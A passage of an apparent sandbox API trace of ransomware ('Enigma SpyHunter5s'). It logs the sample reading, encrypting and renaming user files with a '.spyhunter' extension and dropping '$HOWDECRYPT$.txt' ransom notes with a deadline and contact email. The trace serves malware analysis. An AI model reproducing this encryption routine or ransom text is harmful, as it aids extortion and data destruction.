HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF") returned 98 [0156.212] StrStrW (lpFirst="FSF-CTBL.FSF", lpSrch=".txt") returned 0x0 [0156.212] GetProcessHeap () returned 0x2c0000 [0156.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.212] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecdc*=0x72, lpOverlapped=0x0) returned 1 [0156.212] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.213] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecdc*=0x72, lpOverlapped=0x0) returned 1 [0156.213] GetProcessHeap () returned 0x2c0000 [0156.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.213] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.213] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x25ced1c*, lpNumberOfBytesWritten=0x25cecdc*=0x4, lpOverlapped=0x0) returned 1 [0156.213] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecdc*=0x30, lpOverlapped=0x0) returned 1 [0156.213] CloseHandle (hObject=0xb0) returned 1 [0156.213] GetProcessHeap () returned 0x2c0000 [0156.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.213] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.spyhunter") returned 108 [0156.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.spyhunter")) returned 1 [0156.214] GetProcessHeap () returned 0x2c0000 [0156.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.214] GetProcessHeap () returned 0x2c0000 [0156.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.214] GetProcessHeap () returned 0x2c0000 [0156.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ad80 | out: hHeap=0x2c0000) returned 1 [0156.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced18 | out: pbBuffer=0x25ced18) returned 1 [0156.214] GetProcessHeap () returned 0x2c0000 [0156.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced10*=0x30) returned 1 [0156.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0156.215] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0156.215] GetProcessHeap () returned 0x2c0000 [0156.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.216] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecd4*=0x4f3, lpOverlapped=0x0) returned 1 [0156.233] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.233] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecd4*=0x4f3, lpOverlapped=0x0) returned 1 [0156.233] GetProcessHeap () returned 0x2c0000 [0156.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.234] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.234] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x25ced14*, lpNumberOfBytesWritten=0x25cecd4*=0x4, lpOverlapped=0x0) returned 1 [0156.234] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecd4*=0x30, lpOverlapped=0x0) returned 1 [0156.234] CloseHandle (hObject=0xb0) returned 1 [0156.234] GetProcessHeap () returned 0x2c0000 [0156.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.234] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter") returned 145 [0156.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0156.235] GetProcessHeap () returned 0x2c0000 [0156.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.235] GetProcessHeap () returned 0x2c0000 [0156.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.235] GetProcessHeap () returned 0x2c0000 [0156.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3fe0 | out: hHeap=0x2c0000) returned 1 [0156.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced18 | out: pbBuffer=0x25ced18) returned 1 [0156.235] GetProcessHeap () returned 0x2c0000 [0156.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.235] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced10*=0x30) returned 1 [0156.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0156.236] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0156.236] GetProcessHeap () returned 0x2c0000 [0156.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.236] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecd4*=0x414, lpOverlapped=0x0) returned 1 [0156.240] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.240] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecd4*=0x414, lpOverlapped=0x0) returned 1 [0156.241] GetProcessHeap () returned 0x2c0000 [0156.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.241] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.241] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x25ced14*, lpNumberOfBytesWritten=0x25cecd4*=0x4, lpOverlapped=0x0) returned 1 [0156.241] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecd4*=0x30, lpOverlapped=0x0) returned 1 [0156.241] CloseHandle (hObject=0xb0) returned 1 [0156.245] GetProcessHeap () returned 0x2c0000 [0156.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.245] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.spyhunter") returned 145 [0156.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.spyhunter")) returned 1 [0156.246] GetProcessHeap () returned 0x2c0000 [0156.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.246] GetProcessHeap () returned 0x2c0000 [0156.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.246] GetProcessHeap () returned 0x2c0000 [0156.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3e88 | out: hHeap=0x2c0000) returned 1 [0156.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.246] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.246] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced70, lpOverlapped=0x0 | out: lpBuffer=0x25cec47*, lpNumberOfBytesWritten=0x25ced70*=0x127, lpOverlapped=0x0) returned 1 [0156.247] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.247] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced70*=0x2ac, lpOverlapped=0x0) returned 1 [0156.247] CloseHandle (hObject=0xb0) returned 1 [0156.248] GetProcessHeap () returned 0x2c0000 [0156.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4bfb8 | out: hHeap=0x2c0000) returned 1 [0156.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.249] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.249] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x25cec43*, lpNumberOfBytesWritten=0x25ced6c*=0x127, lpOverlapped=0x0) returned 1 [0156.250] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.250] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced6c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.250] CloseHandle (hObject=0xb0) returned 1 [0156.250] GetProcessHeap () returned 0x2c0000 [0156.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ac68 | out: hHeap=0x2c0000) returned 1 [0156.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.252] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.252] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced68, lpOverlapped=0x0 | out: lpBuffer=0x25cec3f*, lpNumberOfBytesWritten=0x25ced68*=0x127, lpOverlapped=0x0) returned 1 [0156.253] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.253] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced68*=0x2ac, lpOverlapped=0x0) returned 1 [0156.253] CloseHandle (hObject=0xb0) returned 1 [0156.253] GetProcessHeap () returned 0x2c0000 [0156.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47a90 | out: hHeap=0x2c0000) returned 1 [0156.253] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced08 | out: pbBuffer=0x25ced08) returned 1 [0156.253] GetProcessHeap () returned 0x2c0000 [0156.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.253] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced00*=0x30) returned 1 [0156.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0156.254] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0156.254] GetProcessHeap () returned 0x2c0000 [0156.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.254] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecc4*=0x1200, lpOverlapped=0x0) returned 1 [0156.267] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.267] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x25cecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecc4*=0x1200, lpOverlapped=0x0) returned 1 [0156.267] GetProcessHeap () returned 0x2c0000 [0156.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.267] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.267] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecc4, lpOverlapped=0x0 | out: lpBuffer=0x25ced04*, lpNumberOfBytesWritten=0x25cecc4*=0x4, lpOverlapped=0x0) returned 1 [0156.267] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecc4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecc4*=0x30, lpOverlapped=0x0) returned 1 [0156.267] CloseHandle (hObject=0xb0) returned 1 [0156.268] GetProcessHeap () returned 0x2c0000 [0156.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.268] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter") returned 149 [0156.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.spyhunter")) returned 1 [0156.269] GetProcessHeap () returned 0x2c0000 [0156.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.269] GetProcessHeap () returned 0x2c0000 [0156.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.269] GetProcessHeap 